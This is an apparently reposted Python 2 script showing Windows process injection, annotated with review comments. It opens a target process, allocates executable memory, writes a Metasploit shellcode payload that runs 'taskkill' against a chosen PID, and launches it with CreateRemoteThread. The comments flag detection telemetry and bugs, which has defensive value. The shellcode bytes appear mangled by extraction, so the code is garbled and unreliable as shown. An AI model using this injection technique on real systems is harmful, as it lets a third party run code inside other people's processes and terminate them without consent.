用python写windows code inject的一个例子


hi.baidu.com/80sec

import sys
from ctypes import *

# Python 2 script (uses `print` statements): copies a fixed shellcode blob into
# another process and starts it with a remote thread.  The sequence below is the
# textbook remote-injection chain -- OpenProcess -> VirtualAllocEx (RWX) ->
# WriteProcessMemory -> CreateRemoteThread -- which is exactly the telemetry
# defenders key on (e.g. Sysmon Event ID 8 for CreateRemoteThread, and RWX
# allocations in a foreign process).  Usage per the message on the line below
# the argv check: <PID to inject into> <PID the payload will kill>.

# Memory protection for the allocated page: readable, writable AND executable.
PAGE_EXECUTE_READWRITE         = 0x00000040
# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | all process-specific rights.
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
# MEM_COMMIT | MEM_RESERVE -- allocate and back the pages in one call.
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )

kernel32      = windll.kernel32
# NOTE(review): both argv entries are indexed here, before the presence check
# below, so a missing argument raises IndexError rather than printing usage.
pid           = int(sys.argv[1])
pid_to_kill   = sys.argv[2]

# NOTE(review): `not sys.argv[1]` is only true for an empty string; by this
# point a missing argument has already failed above.
if not sys.argv[1] or not sys.argv[2]:
    print "Code Injector: ./code_injector.py <PID to inject> <PID to Kill>"
    sys.exit(0)

# Metasploit-generated payload (win32_exec, EXITFUNC=thread,
# CMD=cmd.exe /c taskkill /PID AAAA; Size=159, Encoder=None,
# http://metasploit.com).  The four 'A' bytes are a placeholder that is
# patched with the victim PID below.
# NOTE(review): as rendered on this page the literal is not valid Python --
# the assignment is split from its value and the byte escapes look mangled
# by extraction; the snippet does not parse as shown.
shellcode =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01xefx8b"
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01xeex31xc0x99"
"xacx84xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x04"
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb"
"x8bx1cx8bx01xebx89x5cx24x04xc3x31xc0x64x8bx40x30"
"x85xc0x78x0cx8bx40x0cx8bx70x1cxadx8bx68x08xebx09"
"x8bx80xb0x00x00x00x8bx68x3cx5fx31xf6x60x56x89xf8"
"x83xc0x7bx50x68xefxcexe0x60x68x98xfex8ax0ex57xff"
"xe7x63x6dx64x2ex65x78x65x20x2fx63x20x74x61x73x6b"
"x6bx69x6cx6cx20x2fx50x49x44x20x41x41x41x41x00"

# Pad the PID string to the 4-byte placeholder width.
# NOTE(review): assumes the PID string is at most 4 characters; a longer
# string yields a negative padding (empty) and a replacement longer than the
# placeholder, which silently changes the payload length.
padding       = 4 - (len( pid_to_kill ))
replace_value = pid_to_kill + ( "x00" * padding )
replace_string= "x41" * 4

# Patch the placeholder so the embedded command targets pid_to_kill.
shellcode     = shellcode.replace( replace_string, replace_value )
code_size     = len(shellcode)

# Get a handle to the process we are injecting into.
# PROCESS_ALL_ACCESS needs sufficient rights on the target; the handle is
# never closed afterwards (leaked until the script exits).
# `int(pid)` is redundant -- pid was already converted above.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:

    print "[*] Couldnt acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate some space for the shellcode
# NOTE(review): the return value is not checked; a NULL address on failure
# is passed straight into the calls below.
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)

# Write out the shellcode
# NOTE(review): the BOOL result and `written` are not compared against
# code_size, so a short or failed write goes unnoticed.
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))

# Now we create the remote thread and point its entry routine
# to be head of our shellcode
# This is the call that endpoint monitoring most commonly flags: a thread
# started in another process whose start address is freshly allocated RWX
# memory rather than a mapped module.
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):

    print "[*] Failed to inject process-killing shellcode. Exiting."
    sys.exit(0)

# Success is reported on thread creation alone; the payload's own outcome is
# not observed.
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
print "[*] Process %s should not be running anymore!" % pid_to_kill
